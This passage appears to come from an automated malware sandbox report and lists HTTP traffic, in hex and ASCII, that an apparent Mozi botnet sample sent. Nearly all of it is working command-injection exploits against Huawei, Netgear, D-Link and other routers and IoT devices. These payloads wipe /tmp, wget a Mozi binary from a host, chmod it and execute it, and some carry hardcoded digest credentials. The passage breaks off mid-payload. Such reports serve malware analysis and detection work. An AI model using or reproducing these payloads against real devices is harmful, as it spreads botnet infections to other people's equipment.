52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 17.238.190.54:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 53.188.136.82:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 37.215.196.232:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 97.164.5.45:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 180.4.129.187:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 149.197.49.203:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 15.96.39.113:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 161.191.205.75:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 222.75.43.46:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 